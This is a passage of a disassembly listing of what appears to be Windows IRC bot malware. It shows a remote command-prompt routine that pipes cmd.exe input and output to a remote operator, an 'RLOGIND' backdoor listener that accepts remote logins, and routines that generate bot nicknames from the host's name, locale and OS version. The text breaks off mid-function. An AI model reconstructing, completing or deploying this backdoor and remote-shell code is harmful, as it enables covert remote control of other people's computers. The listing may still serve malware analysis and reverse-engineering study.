loc_40F14D: ; CODE XREF: sub_40F105+109�j
xor edi, edi
loc_40F14F: ; CODE XREF: sub_40F105+46�j
cmp [ebp+var_4], edi
jnz short loc_40F17F
lea eax, [ebp+var_8]
push eax
push dword_47BF70
call ds:dword_420108 ; GetExitCodeProcess
test eax, eax
jz short loc_40F175
cmp [ebp+var_8], 103h
jnz loc_40F241
loc_40F175: ; CODE XREF: sub_40F105+61�j
push 0Ah
call ds:dword_420000 ; Sleep
jmp short loc_40F1E6
; ---------------------------------------------------------------------------
loc_40F17F: ; CODE XREF: sub_40F105+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40F19A
loc_40F186: ; CODE XREF: sub_40F105+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_40F238
inc eax
cmp eax, [ebp+var_4]
jb short loc_40F186
loc_40F19A: ; CODE XREF: sub_40F105+7F�j
mov [ebp+var_4], esi
loc_40F19D: ; CODE XREF: sub_40F105+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_47BF38
call ds:dword_42008C ; ReadFile
test eax, eax
jz loc_40F269
lea eax, [ebp+var_20C]
push eax
push offset dword_47BF3C
push dword_47BF30
call sub_40F077
add esp, 0Ch
loc_40F1E6: ; CODE XREF: sub_40F105+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_47BF38
call ds:dword_42010C ; PeekNamedPipe
test eax, eax
jnz loc_40F14D
loc_40F214: ; CODE XREF: sub_40F105+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_47BF3C
push dword_47BF30
call sub_40F077
push [ebp+arg_0]
call sub_41255E
add esp, 10h
push 1
jmp short loc_40F28B
; ---------------------------------------------------------------------------
loc_40F238: ; CODE XREF: sub_40F105+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_40F19D
; ---------------------------------------------------------------------------
loc_40F241: ; CODE XREF: sub_40F105+6A�j
call sub_40F009
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_47BF3C
push dword_47BF30
call sub_40F077
push [ebp+arg_0]
call sub_41255E
add esp, 10h
push edi
jmp short loc_40F28B
; ---------------------------------------------------------------------------
loc_40F269: ; CODE XREF: sub_40F105+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_47BF3C
push dword_47BF30
call sub_40F077
push [ebp+arg_0]
call sub_41255E
add esp, 10h
push 0
loc_40F28B: ; CODE XREF: sub_40F105+131�j
; sub_40F105+162�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F105 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F292 proc near ; CODE XREF: sub_4089DC+4655�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_40F009
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_435828 ; SearchPathA
test eax, eax
jnz short loc_40F2C9
or eax, 0FFFFFFFFh
jmp loc_40F43E
; ---------------------------------------------------------------------------
loc_40F2C9: ; CODE XREF: sub_40F292+2D�j
push ebx
push edi
mov edi, ds:dword_420114
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jnz short loc_40F2FC
loc_40F2F4: ; CODE XREF: sub_40F292+7B�j
; sub_40F292+9D�j ...
or eax, 0FFFFFFFFh
jmp loc_40F43C
; ---------------------------------------------------------------------------
loc_40F2FC: ; CODE XREF: sub_40F292+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz short loc_40F2F4
mov edi, ds:dword_4200E0
push 3
push esi
push esi
push offset dword_47BF2C
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_420110 ; DuplicateHandle
test eax, eax
jz short loc_40F2F4
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 420AEAh
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz loc_40F2F4
push [ebp+var_4]
mov edi, ds:dword_42003C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_47BF38, eax
mov eax, [ebp+var_8]
mov dword_47BF34, eax
mov eax, [ebp+var_2C]
mov dword_47BF70, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_47BF30, eax
jz short loc_40F3C8
push [ebp+arg_4]
jmp short loc_40F3C9
; ---------------------------------------------------------------------------
loc_40F3C8: ; CODE XREF: sub_40F292+12F�j
push ebx
loc_40F3C9: ; CODE XREF: sub_40F292+134�j
push offset dword_47BF3C
call sub_414415
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_41229A
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_4366A8[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40F105
push esi
push esi
call ds:dword_42000C ; CreateThread
cmp eax, esi
mov dword_4366B4[edi], eax
jnz short loc_40F43A
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_414415
lea eax, [ebp+var_378]
push eax
call sub_401EFF
add esp, 10h
loc_40F43A: ; CODE XREF: sub_40F292+17F�j
xor eax, eax
loc_40F43C: ; CODE XREF: sub_40F292+65�j
pop edi
pop ebx
loc_40F43E: ; CODE XREF: sub_40F292+32�j
pop esi
leave
retn
sub_40F292 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F441 proc near ; CODE XREF: sub_40F4D9+A6�p
; sub_40F4D9+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_40F448: ; CODE XREF: sub_40F441+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_43577C ; recv
cmp eax, 1
jnz short loc_40F47E
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_40F473
test al, al
jnz short loc_40F448
xor eax, eax
inc eax
loc_40F470: ; CODE XREF: sub_40F441+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40F473: ; CODE XREF: sub_40F441+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401F73
pop ecx
loc_40F47E: ; CODE XREF: sub_40F441+1B�j
xor eax, eax
jmp short loc_40F470
sub_40F441 endp
; =============== S U B R O U T I N E =======================================
sub_40F482 proc near ; DATA XREF: sub_40F6E5+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_40F482 endp
; =============== S U B R O U T I N E =======================================
sub_40F48C proc near ; CODE XREF: sub_40F4D9+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_40F491: ; CODE XREF: sub_40F48C+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40F4B3
test cl, cl
jz short loc_40F4AF
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40F4B3
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40F491
loc_40F4AF: ; CODE XREF: sub_40F48C+F�j
xor eax, eax
jmp short loc_40F4B8
; ---------------------------------------------------------------------------
loc_40F4B3: ; CODE XREF: sub_40F48C+B�j
; sub_40F48C+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F4B8: ; CODE XREF: sub_40F48C+25�j
test eax, eax
pop esi
jz short loc_40F4D5
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401F73
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F4D5: ; CODE XREF: sub_40F48C+2F�j
xor eax, eax
inc eax
retn
sub_40F48C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F4D9 proc near ; DATA XREF: sub_40F6E5+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_4366AC[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_4358AC ; select
test eax, eax
jnz short loc_40F562
push dword_4366AC[esi]
call dword_435914 ; closesocket
push [ebp+74h+var_208]
loc_40F557: ; CODE XREF: sub_40F4D9+1A2�j
call sub_41255E
pop ecx
jmp loc_40F6DD
; ---------------------------------------------------------------------------
loc_40F562: ; CODE XREF: sub_40F4D9+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_4366AC[esi]
call dword_43577C ; recv
push 10h
push dword_4366AC[esi]
lea eax, [ebp+74h+var_2C]
call sub_40F441
push 10h
push dword_4366AC[esi]
lea eax, [ebp+74h+var_4C]
call sub_40F441
push 40h
push dword_4366AC[esi]
lea eax, [ebp+74h+var_F0]
call sub_40F441
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_4366AC[esi]
mov [ebp+74h+var_4], 10h
call dword_435848 ; getpeername
test eax, eax
jz short loc_40F5EA
call dword_4358C0 ; WSAGetLastError
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401F73
push [ebp+74h+var_208]
call sub_41255E
add esp, 0Ch
jmp loc_40F6DD
; ---------------------------------------------------------------------------
loc_40F5EA: ; CODE XREF: sub_40F4D9+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_4358F8 ; gethostbyaddr
cmp eax, ebx
jnz short loc_40F613
push [ebp+74h+var_18]
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_414415
pop ecx
pop ecx
jmp short loc_40F622
; ---------------------------------------------------------------------------
loc_40F613: ; CODE XREF: sub_40F4D9+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_40F618: ; CODE XREF: sub_40F4D9+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40F618
loc_40F622: ; CODE XREF: sub_40F4D9+138�j
push ebx
push edi
push 420AEAh
push dword_4366AC[esi]
call dword_43589C ; send
cmp dword_47BF78, ebx
jnz short loc_40F680
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_40F48C
add esp, 0Ch
test eax, eax
jnz short loc_40F680
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_4366AC[esi]
push dword ptr [esi]
call dword_43589C ; send
push dword ptr [esi]
call dword_435914 ; closesocket
push [ebp+74h+arg_0]
jmp loc_40F557
; ---------------------------------------------------------------------------
loc_40F680: ; CODE XREF: sub_40F4D9+162�j
; sub_40F4D9+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401F73
push [ebp+74h+arg_0]
call sub_4108C1
add esp, 10h
test eax, eax
jnz short loc_40F6C0
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401F73
push [ebp+74h+arg_0]
call sub_41255E
add esp, 0Ch
push edi
jmp short loc_40F6DE
; ---------------------------------------------------------------------------
loc_40F6C0: ; CODE XREF: sub_40F4D9+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401F73
push [ebp+74h+arg_0]
call sub_41255E
add esp, 10h
loc_40F6DD: ; CODE XREF: sub_40F4D9+84�j
; sub_40F4D9+10C�j
push ebx
loc_40F6DE: ; CODE XREF: sub_40F4D9+1E5�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F4D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F6E5 proc near ; DATA XREF: sub_4089DC+4514�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_435818 ; WSAStartup
xor ebx, ebx
cmp eax, ebx
jz short loc_40F73E
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401F73
push [ebp+var_50]
call sub_41255E
add esp, 0Ch
loc_40F738: ; CODE XREF: sub_40F6E5+8B�j
push esi
jmp loc_40F95A
; ---------------------------------------------------------------------------
loc_40F73E: ; CODE XREF: sub_40F6E5+3B�j
push esi
push offset sub_40F482
call ds:dword_420118 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_40F772
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401F73
pop ecx
pop ecx
call dword_435920 ; WSACleanup
push [ebp+var_50]
call sub_41255E
pop ecx
jmp short loc_40F738
; ---------------------------------------------------------------------------
loc_40F772: ; CODE XREF: sub_40F6E5+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_435954 ; htons
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_435808 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40F8EA
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_4366AC[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_4358E0 ; bind
test eax, eax
jnz loc_40F8EA
push 7FFFFFFFh
push [ebp+arg_0]
call dword_435928 ; listen
test eax, eax
jnz loc_40F8EA
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401EFF
pop ecx
mov [ebp+var_8], esi
jmp loc_40F8C9
; ---------------------------------------------------------------------------
loc_40F804: ; CODE XREF: sub_40F6E5+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_435824 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_40F8C9
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_414415
lea eax, [ebp+var_418]
push eax
call sub_401EFF
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_41229A
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_4366A4[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_40F4D9
push ebx
lea eax, [ebp+var_14]
push eax
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
jnz short loc_40F8C4
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401F73
pop ecx
pop ecx
jmp short loc_40F8ED
; ---------------------------------------------------------------------------
loc_40F8BC: ; CODE XREF: sub_40F6E5+1E2�j
push 32h
call ds:dword_420000 ; Sleep
loc_40F8C4: ; CODE XREF: sub_40F6E5+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_40F8BC
loc_40F8C9: ; CODE XREF: sub_40F6E5+11A�j
; sub_40F6E5+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_4357CC ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_40F804
jmp short loc_40F8ED
; ---------------------------------------------------------------------------
loc_40F8EA: ; CODE XREF: sub_40F6E5+BD�j
; sub_40F6E5+E3�j ...
mov esi, [ebp+arg_0]
loc_40F8ED: ; CODE XREF: sub_40F6E5+1D5�j
; sub_40F6E5+203�j
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_40F92D
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_4056BF
add esp, 14h
loc_40F92D: ; CODE XREF: sub_40F6E5+226�j
lea eax, [ebp+var_418]
push eax
call sub_401EFF
pop ecx
push esi
call dword_435914 ; closesocket
push [ebp+arg_0]
call dword_435914 ; closesocket
call dword_435920 ; WSACleanup
push [ebp+var_50]
call sub_41255E
pop ecx
push ebx
loc_40F95A: ; CODE XREF: sub_40F6E5+54�j
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F6E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F961 proc near ; CODE XREF: sub_40FC7C+6C�p
; DATA XREF: .data:off_42C320�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_41466D
xor esi, esi
add esp, 10h
cmp dword_42BED4, esi
jle short loc_40F9BA
loc_40F994: ; CODE XREF: sub_40F961+57�j
call sub_4145D1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41466D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40F994
loc_40F9BA: ; CODE XREF: sub_40F961+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40F961 endp
; =============== S U B R O U T I N E =======================================
sub_40F9BF proc near ; CODE XREF: sub_4089DC+2FE5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
pop ecx
call sub_4145D1
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42BED4
test esi, esi
jle short loc_40FA02
loc_40F9EC: ; CODE XREF: sub_40F9BF+41�j
call sub_4145D1
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40F9EC
loc_40FA02: ; CODE XREF: sub_40F9BF+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40F9BF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_4200DC ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41466D
xor esi, esi
add esp, 0Ch
cmp dword_42BED4, esi
jle short loc_40FA75
loc_40FA4F: ; CODE XREF: .text:0040FA73�j
call sub_4145D1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41466D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FA4F
loc_40FA75: ; CODE XREF: .text:0040FA4D�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_42011C ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_41466D
xor esi, esi
add esp, 10h
cmp dword_42BED4, esi
jle short loc_40FAEA
loc_40FAC4: ; CODE XREF: .text:0040FAE8�j
call sub_4145D1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41466D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FAC4
loc_40FAEA: ; CODE XREF: .text:0040FAC2�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 420AEAh
mov dword ptr [ebp-20h], 94h
call ds:dword_420120 ; GetVersionExA
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_40FB5E
cmp dword ptr [ebp-18h], 0
jnz short loc_40FB44
cmp dword ptr [ebp-10h], 1
jnz short loc_40FB37
mov esi, offset a95 ; "95"
loc_40FB37: ; CODE XREF: .text:0040FB30�j
cmp dword ptr [ebp-10h], 2
jnz short loc_40FB8E
mov esi, offset aNt ; "NT"
jmp short loc_40FB8E
; ---------------------------------------------------------------------------
loc_40FB44: ; CODE XREF: .text:0040FB2A�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_40FB51
mov esi, offset a98 ; "98"
jmp short loc_40FB8E
; ---------------------------------------------------------------------------
loc_40FB51: ; CODE XREF: .text:0040FB48�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_40FB89
mov esi, offset aMe_0 ; "ME"
jmp short loc_40FB8E
; ---------------------------------------------------------------------------
loc_40FB5E: ; CODE XREF: .text:0040FB24�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_40FB89
cmp dword ptr [ebp-18h], 0
jnz short loc_40FB71
mov esi, offset a2k ; "2K"
jmp short loc_40FB8E
; ---------------------------------------------------------------------------
loc_40FB71: ; CODE XREF: .text:0040FB68�j
cmp dword ptr [ebp-18h], 1
jnz short loc_40FB7E
mov esi, offset aXp_0 ; "XP"
jmp short loc_40FB8E
; ---------------------------------------------------------------------------
loc_40FB7E: ; CODE XREF: .text:0040FB75�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40FB8E
loc_40FB89: ; CODE XREF: .text:0040FB55�j
; .text:0040FB62�j
mov esi, offset a??? ; "???"
loc_40FB8E: ; CODE XREF: .text:0040FB3B�j
; .text:0040FB42�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_7 ; "[%s]"
push 1Ch
push edi
call sub_41466D
xor esi, esi
add esp, 10h
cmp dword_42BED4, esi
jle short loc_40FBD2
loc_40FBAC: ; CODE XREF: .text:0040FBD0�j
call sub_4145D1
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41466D
add esp, 14h
inc esi
cmp esi, dword_42BED4
jl short loc_40FBAC
loc_40FBD2: ; CODE XREF: .text:0040FBAA�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FBDB proc near ; CODE XREF: sub_40FC7C+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_435860 ; FindWindowA
test esi, esi
jbe short loc_40FC29
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40FC12
mov eax, 420AEAh
loc_40FC12: ; CODE XREF: sub_40FBDB+30�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41466D
add esp, 14h
jmp short loc_40FC43
; ---------------------------------------------------------------------------
loc_40FC29: ; CODE XREF: sub_40FBDB+27�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40FC37
mov eax, 420AEAh
loc_40FC37: ; CODE XREF: sub_40FBDB+55�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_414415
pop ecx
pop ecx
loc_40FC43: ; CODE XREF: sub_40FBDB+4C�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_40FC4A: ; CODE XREF: sub_40FBDB+74�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FC4A
sub eax, edx
cmp eax, 2
jbe short loc_40FC77
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_4142E0
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_4144A0
add esp, 18h
loc_40FC77: ; CODE XREF: sub_40FBDB+7B�j
mov eax, [ebp+arg_0]
leave
retn
sub_40FBDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FC7C proc near ; CODE XREF: sub_408601+53�p
; sub_40887D+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_40FC86: ; CODE XREF: sub_40FC7C+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_40FCC5
lea eax, dword_42C310[edi]
loc_40FC93: ; CODE XREF: sub_40FC7C+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_40FCB5
test cl, cl
jz short loc_40FCB1
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_40FCB5
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_40FC93
